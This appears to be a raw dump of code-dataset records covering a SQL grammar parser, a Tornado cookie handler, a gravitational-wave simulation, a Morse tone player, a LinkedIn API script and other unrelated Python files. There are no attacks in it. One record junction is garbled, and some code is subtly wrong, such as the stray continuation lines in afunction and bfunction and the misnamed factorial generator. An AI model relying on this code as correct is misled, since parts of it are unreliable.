Predicates(t[1],t[3],t[5], 'BETWEEN', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'IS' and t.slice[3].type == 'NOT' and t.slice[4].type == 'DISTINCT' :\n t[0] = Predicates(t[1],t[6],None, 'IS NOT DISTINCT', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'NOT' and t.slice[3].type == 'BETWEEN' :\n t[0] = Predicates(t[1],t[4],t[6], 'NOT BETWEEN', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'BETWEEN' and t.slice[3].type == 'SYMMETRIC':\n t[0] = Predicates(t[1],t[4],t[6], 'BETWEEN SYMMETRIC', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'NOT' and t.slice[3].type == 'BETWEEN' and t.slice[4].type == 'SYMMETRIC' :\n t[0] = Predicates(t[1],t[5],t[7], 'NOT BETWEEN SYMMETRIC', t.slice[2].lexpos,t.slice[2].lineno)\n\ndef p_data(t):\n '''data : ID table_at''' \n t[0] = Id(t[1],t[2], t.slice[1].lexpos,t.slice[1].lineno)\n\ndef p_table_at(t):\n '''table_at : PUNTO ID\n | ''' #epsilon\n if len(t) == 3:\n t[0] = t[2]\n else :\n t[0] = None\n \ndef p_sub_consulta(t):\n '''sub_consulta : PARABRE ins_select PARCIERRE''' \n t[0] = t[2]\n\ndef p_arg_pattern(t):\n '''arg_pattern : data LIKE CADENA \n | data NOT LIKE CADENA ''' \n\ndef p_arg_group_by(t):\n '''arg_group_by : GROUP BY g_list\n | ''' #epsilon\n if len(t) == 4:\n t[0] = t[3]\n else:\n t[0] = None\n\ndef p_g_list(t):\n '''g_list : g_list COMA g_item\n | g_item ''' \n if len(t) == 4:\n t[1].append(t[3])\n t[0] = t[1]\n else:\n t[0] = [t[1]]\n\ndef p_g_item(t):\n '''g_item : ID g_refitem''' \n if t[2] == None:\n t[0] = {'father':None, 'id': t[1]}\n else:\n t[0] = {'father': t[1], 'id': t[2]}\n\ndef p_g_refitem(t):\n '''g_refitem : PUNTO ID\n | ''' #epsilon\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_arg_order_by(t):\n '''arg_order_by : ORDER BY o_list\n | ''' #epsilon\n if len(t) == 4:\n t[0] = t[3]\n else:\n t[0] = None\n\ndef p_o_list(t):\n '''o_list : o_list COMA o_item\n | o_item ''' \n if len(t) == 4:\n t[1].append(t[3])\n t[0] = t[1]\n else:\n t[0] = [t[1]]\n\ndef p_o_item(t):\n '''o_item : ID o_refitem ad arg_nulls''' \n if t[2] != None:\n t[0] = {'father': t[1], 'id': t[2], 'ad': t[3], 'nulls': t[4]}\n else:\n t[0] = {'father': None, 'id': t[1], 'ad': t[3], 'nulls': t[4]}\n\ndef p_o_refitem(t):\n '''o_refitem : PUNTO ID\n | ''' #epsilon\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_ad(t):\n '''ad : ASC\n | DESC\n | ''' #epsilon\n if len(t) == 2:\n t[0] = t[1]\n else:\n t[0] = None\n\ndef p_arg_nulls(t):\n '''arg_nulls : NULLS arg_fl\n | ''' #epsilon\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_arg_fl(t):\n '''arg_fl : FIRST\n | LAST''' #epsilon\n t[0] = t[1]\n\ndef p_arg_limit(t):\n '''arg_limit : LIMIT option_limit\n | ''' #epsilon\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_option_limit(t):\n '''option_limit : NUMERO\n | ALL ''' \n t[0] = t[1]\n\ndef p_arg_offset(t):\n '''arg_offset : OFFSET NUMERO \n | ''' #epsilon\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_ins_update(t):\n '''ins_update : UPDATE ID SET asign_list WHERE exp PUNTO_COMA '''\n t[0] = Update(t[2], t[4], t[6], t.slice[2].lexpos, t.slice[2].lineno)\n\ndef p_ins_asign_list(t):\n '''asign_list : asign_list COMA ID SIGNO_IGUAL exp \n | ID SIGNO_IGUAL exp'''\n if len(t) == 6:\n t[0] = t[1].append({'id': t[3], 'value': t[5]})\n else: \n t[0] = [{'id': t[1], 'value': t[3]}]\n\ndef p_ins_delete(t):\n '''ins_delete : DELETE FROM ID WHERE exp PUNTO_COMA'''\n t[0] = Delete(t[3], t[5], t.slice[2].lexpos, t.slice[2].lineno)\n\ndef p_ins_create_pl(t):\n '''ins_create_pl : CREATE op_replace FUNCTION ID PARABRE parameters PARCIERRE returns AS block LANGUAGE ID PUNTO_COMA\n | CREATE op_replace PROCEDURE ID PARABRE parameters PARCIERRE AS block LANGUAGE ID PUNTO_COMA\n '''\n\ndef p_op_replace(t):\n '''op_replace : OR REPLACE\n | '''\n\ndef p_parameters(t):\n '''parameters : parameters COMA ID tipo_dato\n | parameters COMA tipo_dato\n | ID tipo_dato\n | tipo_dato\n |\n '''\n\ndef p_retruns(t):\n '''returns : RETURNS exp\n | RETURNS ANYELEMENT\n | RETURNS TABLE PARABRE parameters PARCIERRE \n | RETURNS ANYCOMPATIBLE\n | RETURNS tipo_dato\n | RETURNS VOID\n | \n '''\n\ndef p_block(t):\n '''block : DOLAR_LABEL body PUNTO_COMA DOLAR_LABEL\n '''\n\ndef p_body(t):\n '''body : declare_statement BEGIN internal_block END \n '''\n\ndef p_declare(t):\n '''declare_statement : DECLARE\n | declare_statement statements \n | '''\n\ndef p_declaracion(t):\n '''declaracion : ID constante tipo_dato not_null declaracion_default PUNTO_COMA'''\n print('DECLARACION')\n\ndef p_internal_block(t):\n '''internal_block : internal_block internal_body \n | internal_body \n | \n '''\n\ndef p_internal_body(t):\n '''internal_body : body PUNTO_COMA\n | instruccion_if\n | instruccion_case\n | return\n | statements\n '''\n\ndef p_constante(t):\n '''constante : CONSTANT'''\n\ndef p_constante_null(t):\n '''constante : '''\n\ndef p_not_null(t):\n '''not_null : NOT NULL'''\n\ndef p_not_null_null(t):\n '''not_null : '''\n\ndef p_declaracion_default(t):\n '''declaracion_default : DEFAULT exp'''\n\ndef p_declaracion_default_dos(t):\n '''declaracion_default : SIGNO_IGUAL exp '''\n print('ENTRA =')\n\ndef p_declaracion_default_signo(t):\n '''declaracion_default : DOSPUNTOS SIGNO_IGUAL exp'''\n print('ENTRA :=')\n\ndef p_declaracion_default_null(t):\n '''declaracion_default : '''\n\ndef p_declaracionf_funcion(t):\n '''declaracion_funcion : ID ALIAS FOR DOLAR NUMERO PUNTO_COMA'''\n print('ALIAS')\n\ndef p_declaracionf_funcion_rename(t):\n '''declaracion_funcion : ID ALIAS FOR ID PUNTO_COMA'''\n print('ALIAS RENAME')\n\ndef p_declaracionc_copy(t):\n '''declaracion_copy : ID ID PUNTO ID SIGNO_MODULO TYPE PUNTO_COMA'''\n print('COPY TYPE')\n\ndef p_declaracionr_row(t):\n '''declaracion_row : ID ID SIGNO_MODULO ROWTYPE PUNTO_COMA'''\n print('COPY ROW')\n\ndef p_declaracionre_record(t):\n '''declaracion_record : ID RECORD PUNTO_COMA'''\n print('RECORD')\n\ndef p_asignacion(t):\n '''asignacion : ID referencia_id SIGNO_IGUAL exp PUNTO_COMA'''\n print('ASIGNACION')\n #t[0] = GenerarC3D()\n #t[0].code = t[1] + ' = \\n'\n\ndef p_asignacion_igual(t):\n '''asignacion : ID referencia_id SIGNO_IGUAL ins_select PUNTO_COMA'''\n print('ASIGNACION')\n #t[0] = GenerarC3D()\n #t[0].code = t[1] + ' = \\n'\n\ndef p_asignacion_dos(t):\n '''asignacion : ID referencia_id DOSPUNTOS SIGNO_IGUAL exp PUNTO_COMA'''\n print('ASIGNACION')\n #t[0] = GenerarC3D()\n #t[0].code = t[1] + ' = \\n'\n\ndef p_asignacion_dos_signo(t):\n '''asignacion : ID referencia_id DOSPUNTOS SIGNO_IGUAL ins_select PUNTO_COMA'''\n print('ASIGNACION')\n #t[0] = GenerarC3D()\n #t[0].code = t[1] + ' = parser.parse(\n \n \n \"\"\"\n self.write(html)\n\n def post(self):\n name = self.get_argument('name')\n if self.request.cookies.get(name, None):\n # 存在的\n self.clear_cookie(name)\n self.write('

删除 %s 成功

' % name)\n else:\n self.write('

删除 %s 失败, 不存在!

' % name)\n\n # 重定向操作时,不需要再调用self.write()\n self.redirect('/cookie') # 重定向\n","sub_path":"app/views/cookie.py","file_name":"cookie.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"114092240","text":"\"\"\"\n Created by Xiaozhong on 2018/11/5.\n Copyright (c) 2018/11/5 Xiaozhong. All rights reserved.\n\"\"\"\n\nimport sys\n#\n#\n# arg = sys.argv[0]\n# print(\"第一个参数是:\" + str(arg))\n#\n# arg = sys.argv[1]\n# print(\"第二个参数是:\" + str(arg))\n\n# 读取控制台参数,并且将其设置为字典数据格式\ncmdss = {}\nfor index in range(1, len(sys.argv)):\n if index % 2 != 0:\n cmdss[sys.argv[index]] = sys.argv[index + 1]\n\nprint(cmdss)\n","sub_path":"python_learning/sample_python2exe/cmd_reader.py","file_name":"cmd_reader.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"150036025","text":"import json\nfrom collections import OrderedDict\n\nfrom coala_utils.param_conversion import negate\nfrom coalib.bearlib import deprecate_settings\nfrom coalib.bearlib.spacing.SpacingHelper import SpacingHelper\nfrom coalib.bears.LocalBear import LocalBear\nfrom coalib.misc.Compatibility import JSONDecodeError\nfrom coalib.results.Diff import Diff\nfrom coalib.results.Result import Result\n\n\nclass JSONFormatBear(LocalBear):\n\n LANGUAGES = {'JSON'}\n AUTHORS = {'The coala developers'}\n AUTHORS_EMAILS = {'coala-devel@googlegroups.com'}\n ASCIINEMA_URL = 'https://asciinema.org/a/6vxc7076tnf996zanpdfwojwu'\n LICENSE = 'AGPL-3.0'\n CAN_DETECT = {'Formatting'}\n\n @deprecate_settings(indent_size='tab_width',\n escape_unicode=('keep_unicode', negate))\n def run(self, filename, file,\n json_sort: bool=False,\n indent_size: int=SpacingHelper.DEFAULT_TAB_WIDTH,\n escape_unicode: bool=True):\n \"\"\"\n Raises issues for any deviations from the pretty-printed JSON.\n\n :param json_sort: Whether or not keys should be sorted.\n :param indent_size: Number of spaces per indentation level.\n :param escape_unicode: Whether or not to escape unicode values using\n ASCII.\n \"\"\"\n try:\n json_content = json.loads(''.join(file),\n object_pairs_hook=OrderedDict)\n except JSONDecodeError as err:\n yield Result.from_values(\n self,\n 'This file does not contain parsable JSON. ' + repr(str(err)),\n file=filename)\n return\n\n corrected = json.dumps(json_content,\n sort_keys=json_sort,\n indent=indent_size,\n ensure_ascii=escape_unicode\n ).splitlines(True)\n # Because of a bug in several python versions we have to correct\n # whitespace here.\n corrected = tuple(line.rstrip(' \\n') + '\\n' for line in corrected)\n diff = Diff.from_string_arrays(file, corrected)\n\n if len(diff) > 0:\n yield Result(self,\n 'This file can be reformatted by sorting keys and '\n 'following indentation.',\n affected_code=tuple(d.range(filename)\n for d in diff.split_diff()),\n diffs={filename: diff})\n","sub_path":"ve/Lib/site-packages/bears/js/JSONFormatBear.py","file_name":"JSONFormatBear.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"545587109","text":"from __future__ import division\n\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport random\nimport pylab\n\ndef AP_PLUS(eta,a,b,psi):\n ret = math.sin(eta) * ((a * math.cos(2 * psi)) + (b * math.sin(2 * psi))) \n return ret\n \ndef AP_CROSS(eta,a,b,psi):\n ret = math.sin(eta) * ((b * math.cos(2 * psi)) - (a * math.sin(2 * psi)))\n return ret\n\ndef afunction(chi, beta, theta, phi, lambd):\n ret = ((1/16) * math.sin(2 * chi) * (3 - math.cos(2 * beta)) * (3 - math.cos(2 * theta))\n * math.cos(2 * (phi + lambd)))\n \n + ((1/4) * math.cos(2 * chi) * math.sin(beta) * (3 - math.cos(2 * theta))\n * math.sin(2 * (phi + lambd)))\n \n + ((1/4) * math.sin(2 * chi) * math.sin(2 * beta) * math.sin(2 * theta) * math.cos(phi + lambd))\n \n + ((1/2) * math.cos(2 * chi) * math.cos(beta) * math.sin(2 * theta) * math.sin(phi + lambd))\n \n + ((3/4) * math.sin(2 * chi) * (math.cos(beta) ** 2) * (math.sin(theta) ** 2))\n return ret\n \ndef bfunction(chi, beta, theta, phi, lambd):\n ret = (math.cos(2 * chi) * math.sin(beta) * math.cos(theta) * math.cos(2 * (phi + lambd)))\n \n - ((1/4) * math.sin(2 * chi) * (3 - math.cos(2 * beta)) * math.cos(theta) * math.sin(2 * (phi * lambd)))\n \n + (math.cos(2 * chi) * math.cos(beta) * math.sin(theta) * math.cos(phi + lambd))\n \n - ((1/2) * math.sin(2 * chi) * math.sin(2 * beta) * math.sin(theta) * math.sin(phi + lambd))\n return ret\n\ndef COMPASS_TO_ANGLE(compassdirection):\n ret = ((5 * math.pi) / 2) - compassdirection\n return ret\n \ndef DMS_TO_DEGREES(degs, mins, secs):\n ret = degs + (mins/60) + (secs/3600)\n return ret\n\ndef standarddev (x, mu, N):\n summ = 0\n for deff in range(0, N):\n adder = (x[deff] - mu) ** 2\n summ = summ + adder\n ret = math.sqrt(summ/(N-1))\n return ret\n\ndef VolumeSphere(r):\n ret = (4/3) * math.pi * (r ** 3)\n return ret\n\ndef VolumeShell(min, max):\n ret = VolumeSphere(max) - VolumeSphere(min)\n return ret\n\ndef VolumeGpc(min, max, percent):\n ret = str((VolumeShell(min, max) * percent) / (1000 ** 3))\n return ret\n\ndef AntennaPowerSingle(theta, phi):\n ret = ((1/4) * ((1 + (math.cos(theta) ** 2)) ** 2) * (math.cos(2 * phi) ** 2)) + ((math.cos(theta) ** 2) * (math.sin(2 * phi) ** 2))\n return ret\n\nDv_LOUIS, Dv_WASH, Dv_VIRGO = 190, 190, 145\ntrials = 100 # input(\"Enter the number of points you want to test: \") + 1\niterations = 100\nGWPERCENTMEAN, GWFINALnum = [], 0\nminDistance = 0 #Min distance of generation in Mpc\nmaxDistance = 450 #Max distance of generation in Mpc\n\nantennaPowerPatternLouis = []\nantennaPowerPatternSingle = []\ninclinationMultiplier = []\nfor q in range(0,iterations):\n RHO_PLUS_LOUIS, RHO_CROSS_LOUIS, RHO_PLUS_WASH, RHO_CROSS_WASH, RHO_PLUS_VIRGO, RHO_CROSS_VIRGO = [], [], [], [], [], []\n a_AP_LOUIS, a_AP_WASH, a_AP_VIRGO, b_AP_LOUIS, b_AP_WASH, b_AP_VIRGO = [], [], [], [], [], []\n h_LOUIS, h_WASH, h_VIRGO, reach = [], [], [], []\n phi, theta, distance, rotationpercent, rotationangle, thetaobs, psi = [], [], [], [], [], [], []\n GRBTESTnum_off, GRBTESTnum_struc_best, GRBTESTnum_struc_sim = 0, 0, 0\n GWTESTnum = 0\n\n #Phi and Theta uniformly distributed \n for z in range(0,trials): # binary neutron star merger creation\n distance.append(random.uniform(minDistance,maxDistance))\n h_LOUIS.append(((((Dv_LOUIS * 12)** 2)))/(((distance[z]) ** 2))) #*2.25 to account for average over polarization\n h_WASH.append(((((Dv_WASH * 12)** 2)))/(((distance[z]) ** 2)))\n h_VIRGO.append((((((Dv_VIRGO * 12) ** 2)))/((distance[z]) ** 2)))\n \n psi.append(random.uniform(0,2 * math.pi))\n phi.append(random.uniform(0, 2 * math.pi))\n theta.append(random.uniform(0, math.pi))\n\n\n thetaobs.append(random.uniform(0,math.pi/2)) #GRB Observation angle and inclination angle\n '''------CREATE POINTS-------'''\n '''------GW DETECTORS------''' #chi is orientation from East in degrees\n #input different detector locations and orientations, beta and lambda are lattitude and longitude\n eta_AP = math.pi/2\n \n #Livingston Louisiana LIGO\n beta_LOUIS = math.radians(DMS_TO_DEGREES(30,33,46.4))\n lambd_LOUIS = math.radians(DMS_TO_DEGREES(90,46,27.3))\n chi_LOUIS = COMPASS_TO_ANGLE(math.radians(208))\n \n #Hanford Washington LIGO\n beta_WASH = math.radians(DMS_TO_DEGREES(46,27,18.5))\n lambd_WASH = math.radians(DMS_TO_DEGREES(119,24,27.6))\n chi_WASH = COMPASS_TO_ANGLE(math.radians(279))\n \n #VIRGO\n beta_VIRGO = math.radians(DMS_TO_DEGREES(43,37,53))\n lambd_VIRGO = math.radians(DMS_TO_DEGREES(10,30,16))\n chi_VIRGO = COMPASS_TO_ANGLE(math.radians(333.5))\n '''------GW DETECTORS------''' \n '''------ANTENNA PATTERNS-------'''\n for d in range(0,trials):\n a_AP_LOUIS.append(afunction(chi_LOUIS, beta_LOUIS, theta[d], phi[d], lambd_LOUIS))\n a_AP_WASH.append(afunction(chi_WASH, beta_WASH, theta[d], phi[d], lambd_WASH))\n a_AP_VIRGO.append(afunction(chi_VIRGO, beta_VIRGO, theta[d], phi[d], lambd_VIRGO))\n \n b_AP_LOUIS.append(bfunction(chi_LOUIS, beta_LOUIS, theta[d], phi[d], lambd_LOUIS))\n b_AP_WASH.append(bfunction(chi_WASH, beta_WASH, theta[d], phi[d], lambd_WASH))\n b_AP_VIRGO.append(bfunction(chi_VIRGO, beta_VIRGO, theta[d], phi[d], lambd_VIRGO))\n \n RHO_PLUS_LOUIS.append(AP_PLUS(eta_AP, a_AP_LOUIS[d], b_AP_LOUIS[d], psi[d]))\n RHO_PLUS_WASH.append(AP_PLUS(eta_AP, a_AP_WASH[d], b_AP_WASH[d], psi[d]))\n RHO_PLUS_VIRGO.append(AP_PLUS(eta_AP, a_AP_VIRGO[d], b_AP_VIRGO[d], psi[d]))\n \n RHO_CROSS_LOUIS.append(AP_CROSS(eta_AP, a_AP_LOUIS[d], b_AP_LOUIS[d], psi[d]))\n RHO_CROSS_WASH.append(AP_CROSS(eta_AP, a_AP_WASH[d], b_AP_WASH[d], psi[d]))\n RHO_CROSS_VIRGO.append(AP_CROSS(eta_AP, a_AP_VIRGO[d], b_AP_VIRGO[d], psi[d]))\n\n antennaPowerPatternSingle.append(AntennaPowerSingle(theta[d], phi[d]))\n '''------ANTENNA PATTERNS------'''\n '''------SNR CALCULATOR/CHECKER------'''\n SNRcalculatedLOUISsig, SNRcalculatedWASHsig, SNRcalculatedVIRGOsig, SNRcalculated, GWTEST = [], [], [], [], []\n SNRnum = 0\n for f in range(0, trials):\n inclinationMultiplier.append((1/8) * (1 + (6 * (math.cos(thetaobs[f]) ** 2)) + (math.cos(thetaobs[f]) ** 4))) #Schutz eq 26\n antennaPowerPatternLouis.append(AntennaPowerSingle(theta[f], phi[f]))#((RHO_PLUS_LOUIS[f]**2) + (RHO_CROSS_LOUIS[f] ** 2)))\n #SNRcalculatedLOUISsig.append(math.sqrt(inclinationMultiplier[f] * antennaPowerPatternLouis[f]))\n SNRcalculatedLOUISsig.append(math.sqrt(inclinationMultiplier[f] * ((RHO_PLUS_LOUIS[f]**2) + (RHO_CROSS_LOUIS[f] ** 2)) * h_LOUIS[f]))\n SNRcalculatedWASHsig.append(math.sqrt(inclinationMultiplier[f] * ((RHO_PLUS_WASH[f] ** 2) + (RHO_CROSS_WASH[f] ** 2)) * h_WASH[f]))\n SNRcalculatedVIRGOsig.append(math.sqrt(inclinationMultiplier[f] * ((RHO_PLUS_VIRGO[f] ** 2) + (RHO_CROSS_VIRGO[f] ** 2)) * h_VIRGO[f]))\n\n\n SNRcalculated.append(math.sqrt((SNRcalculatedLOUISsig[f] ** 2)))#+ (SNRcalculatedWASHsig[f] ** 2# + (SNRcalculatedVIRGOsig[f]**2)))\n #SNRcalculated.append(math.sqrt(antennaPowerPatternLouis[f] * h_LOUIS[f]))\n \n if SNRcalculated[f] >= 12: #network sensitivity in a network of 3 detectors is 12 SNR''\n GWTEST.append(True)\n GWTESTnum += 1 \n else:\n GWTEST.append(False)\n '''------MEAN AND SD AND GRAPH------'''\n GWFINALnum = GWFINALnum + GWTESTnum\n GWPERCENTMEAN.append(GWTESTnum/trials)\n \nGWPERCENT = GWFINALnum / (iterations * trials)\nGWSD = standarddev(GWPERCENTMEAN, GWPERCENT, iterations)\n\n'''------MEAN AND SD AND GRAPH------'''\n'''------SNR CALCULATOR/CHECKER------'''\n'''------DATA DISPLAY------'''\n#print(antennaPowerPatternLouis)\nprint('GW PERCENT ' + str(GWPERCENT))\nprint(' ')\nprint('GW ' + str(GWFINALnum))\nprint(' ')\nprint('GW Volume '+ VolumeGpc(minDistance, maxDistance, GWPERCENT) + ' +/- ' + str((((maxDistance**3) * math.pi * (4/3) * GWSD)/(1000**3))))\n# print(VolumeShell(minDistance, maxDistance))\nprint(max(RHO_CROSS_VIRGO))\nprint(max(RHO_PLUS_VIRGO))\nprint(max(antennaPowerPatternSingle))\nprint(sum(antennaPowerPatternLouis)/len(antennaPowerPatternLouis))\nprint(max(antennaPowerPatternLouis))\nprint(sum(inclinationMultiplier)/len(inclinationMultiplier))\nprint(max(inclinationMultiplier))\n# print(max(SNRcalculatedLOUISsig))\n# print(max(SNRcalculatedWASHsig))\n# print(max(SNRcalculatedVIRGOsig))\n# print(max(SNRcalculated))\n'''------DATA DISPLAY------'''\n","sub_path":"Python stuff/GW only/GW only.py","file_name":"GW only.py","file_ext":"py","file_size_in_byte":8647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"260159985","text":"def avglongwinstreak(n, pwin, abserr=0):\n avg = 0\n for k in range(1, n + 1):\n p = fastpwinstreak(n, pwin, k)\n avg += p\n if (n - k) * p < abserr:\n break\n return avg\n\n\ndef pwinstreak(n, pwin, k):\n memo = [0] * (n + 1)\n for m in range(k, n + 1):\n memo[m] = pwin**k + sum(pwin**j * (1 - pwin) * memo[m - (j + 1)]\n for j in range(k))\n return memo[n]\n\n\ndef fastpwinstreak(n, pwin, k):\n pwink = pwin**k\n memo = [0] * (n + 1)\n windowsum = 0\n for m in range(k, n + 1):\n memo[m] = pwink + windowsum\n windowsum = pwin * windowsum + (1 - pwin) * (memo[m] - pwink *\n memo[m - k])\n return memo[n]\n\n\nprint(avglongwinstreak(3000, 0.4, 0))\nprint(avglongwinstreak(3000, 0.4, 1e-6))\n","sub_path":"2017-02-09/fastalws.py","file_name":"fastalws.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"608480207","text":"def fibo_gen(x):\n result = 1\n for el in list(range(1, x + 1)):\n result *= el\n yield result\n\n\nvar = int(input(\"Введите число \"))\n\ni = 1\n\nfor el in fibo_gen(var):\n if i > 15:\n break\n print(el)\n i += 1\n","sub_path":"les4/ex7.py","file_name":"ex7.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"505268677","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nimport atexit\nimport pygame\nimport time\nimport sys, os\nimport gpiozero as gpio\nimport _thread as thread\nfrom array import array\nfrom pygame.locals import *\nfrom morse_lookup import *\nfrom ToneSound import *\n#from twitter_news import *\nfrom rgbmatrix import RGBMatrix#, RGBMatrixOptions\n\n################################################################\nMINKEYLENGTH = .1# .07 # Minimum dit\nKEYLENGTH = .18 #dit-doh boundary\nWORDLENGTH = .90 # Word boundary\nDOT = \".\"\nDASH = \"-\"\n################################################################\n\nimport pygame\nfrom pygame.locals import *\n\n# Play Sound\nclass ToneSound(pygame.mixer.Sound):\n def __init__(self, frequency, volume):\n self.frequency = frequency\n pygame.mixer.Sound.__init__(self, self.build_samples())\n self.set_volume(volume)\n\n def build_samples(self):\n period = int(round(pygame.mixer.get_init()[0] / self.frequency))\n samples = array(\"h\", [0] * period)\n amplitude = 2 ** (abs(pygame.mixer.get_init()[1]) - 1) - 1\n for time in range(period):\n if time < period / 2:\n samples[time] = amplitude\n else:\n samples[time] = -amplitude\n return samples\n\n def play(self, input):\n if isinstance(input,str):\n self.wordToAudio(input)\n else:\n super(ToneSound, self).play(input)\n\n def wordToAudio(self, word):\n ditlength = (MINKEYLENGTH + KEYLENGTH ) / 2\n for char in word:\n # Print\n print(char)\n\n # Fullstop at space\n if char is \" \":\n time.sleep( WORDLENGTH )\n continue\n\n # Revert char to code\n try:\n morse = list(morse_code_lookup.keys())\\\n [list(morse_code_lookup.values()).index(char.upper())]\n except:\n continue\n\n # Play in audio\n for ditdoh in morse:\n print (ditdoh, end=\"\")\n self.play(-1)\n time.sleep( ditlength if ditdoh is DOT \\\n else ditlength * 3 )\n self.stop()\n time.sleep( ditlength )\n time.sleep( WORDLENGTH )\n print()\n","sub_path":"lib/ToneSound.py","file_name":"ToneSound.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"220900494","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport requests\nfrom api import apiUser\nfrom api import apiConsts\n\n\ndef post(url, params=None):\n for x in range(3):\n res = requests.post(url, data=params)\n print('post %s - %s: [%s]%s - %s' % (res.url, params, res.status_code, res.reason, res.json()))\n if res.status_code == 200:\n break\n\n if res.status_code != 200:\n raise RuntimeError('多次请求失败,请检查网络或接口!');\n return res.json()\n\n\ndef postFunc(func):\n if apiConsts.ACCESS_TOKEN is None: # 未登录\n apiUser.login()\n for x in range(3):\n json = func()\n if json['code'] == '10001': # 未登录\n apiUser.login()\n json = func()\n if json['code'] == '0': # 请求成功\n break\n return json\n\n\nif __name__ == '__main__':\n post('http://www.cxdri.com/interface/weSchoolAction!stuLogin.htm')\n","sub_path":"python-http-requests/src/api/apiBase.py","file_name":"apiBase.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"617233675","text":"from linkedin import linkedin # pip install python-linkedin\n\n# Define CONSUMER_KEY, CONSUMER_SECRET, \n# USER_TOKEN, and USER_SECRET from the credentials \n# provided in your LinkedIn application\n\nCONSUMER_KEY = ''\nCONSUMER_SECRET = ''\nUSER_TOKEN = ''\nUSER_SECRET = ''\n\nRETURN_URL = 'http://localhost:8000' # Not required for developer authentication\n\n# Instantiate the developer authentication class\n\nauth = linkedin.LinkedInDeveloperAuthentication(CONSUMER_KEY, CONSUMER_SECRET, \n USER_TOKEN, USER_SECRET, \n RETURN_URL, \n permissions=linkedin.PERMISSIONS.enums.values())\n\n# Pass it in to the app...\n\napp = linkedin.LinkedInApplication(auth)\n\nimport json\n\nconnections = app.get_connections()\n\nconnections_data = 'linkedin_connections.json'\n\nf = open(connections_data, 'w')\nf.write(json.dumps(connections, indent=1))\nf.close()\n\nDATA_FILENAME = 'position_info.json'\n\nfeeds = []\nwith open(DATA_FILENAME, mode='w') as feedsjson:\n for i in range(len(connections['values'])):\n if connections['values'][i]['id'] != 'private':\n connections['values'][i]['id']\n connection_positions = app.get_profile(member_id=connections['values'][i]['id'], \n selectors=['positions','id'])\n feeds.append(connection_positions)\n json.dump(feeds, feedsjson)","sub_path":"data/linkedin_api_getdata.py","file_name":"linkedin_api_getdata.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"437179104","text":"\"\"\"\nFile: openforcefield2gromos\nWarnings: this class is WIP!\nTODO:REWORK\nDescription:\n This is a super class to convert from a openforcfield topology to a gromos topology\nAuthor: Marc Lehner\n\"\"\"\n\n#imports\nimport importlib\nfrom pygromos.files.topology.top import Top\nfrom pygromos.files.gromos_system.ff.forcefield_system import forcefield_system\n\n\nif(importlib.util.find_spec(\"openff\") == None):\n raise ImportError(\"openforcefield2gromos is not enabled without openFF toolkit package! Please install openFF toolkit.\")\nelse:\n from openff.toolkit.topology import Molecule, Topology\n #from openforcefield.typing.engines import smirnoff\n #from openforcefield.typing.engines.smirnoff import forcefield\n\nfrom pygromos.data import topology_templates\nimport os\nimport collections\nfrom simtk import unit as u\n\nclass openforcefield2gromos():\n def __init__(self, openFFmolecule:Molecule, gromosTop:Top=None, forcefield:forcefield_system=None):\n self.atomic_number_dict = collections.defaultdict(str)\n # get openmm atom type code / periodic table\n self.atomic_number_dict[1] = \"H\"\n self.atomic_number_dict[2] = \"He\"\n self.atomic_number_dict[3] = \"Li\"\n self.atomic_number_dict[4] = \"Be\"\n self.atomic_number_dict[5] = \"B\"\n self.atomic_number_dict[6] = \"C\"\n self.atomic_number_dict[7] = \"N\"\n self.atomic_number_dict[8] = \"O\"\n self.atomic_number_dict[9] = \"F\"\n self.atomic_number_dict[10] = \"Ne\"\n self.atomic_number_dict[11] = \"Na\"\n self.atomic_number_dict[12] = \"Mg\"\n self.atomic_number_dict[13] = \"Al\"\n self.atomic_number_dict[14] = \"Si\"\n self.atomic_number_dict[15] = \"P\"\n self.atomic_number_dict[16] = \"S\"\n self.atomic_number_dict[17] = \"Cl\"\n self.atomic_number_dict[18] = \"Ar\"\n self.atomic_number_dict[19] = \"K\"\n self.atomic_number_dict[20] = \"Ca\"\n self.atomic_number_dict[35] = \"Br\"\n self.atomic_number_dict[53] = \"I\"\n\n\n if gromosTop != None:\n self.gromosTop=gromosTop\n else:\n self.gromosTop = Top(in_value=topology_templates.blank_topo_template)\n self.gromosTop._orig_file_path = os.getcwd()\n \n self.openFFmolecule = openFFmolecule\n self.openFFTop = Topology.from_molecules(openFFmolecule)\n\n #import the openforcfield forcefield-file\n if forcefield != None:\n self.forcefield = forcefield\n else:\n self.forcefield = forcefield_system(name=\"off\")\n self.off = self.forcefield.off\n\n #create list of all forces\n self.molecule_force_list = []\n 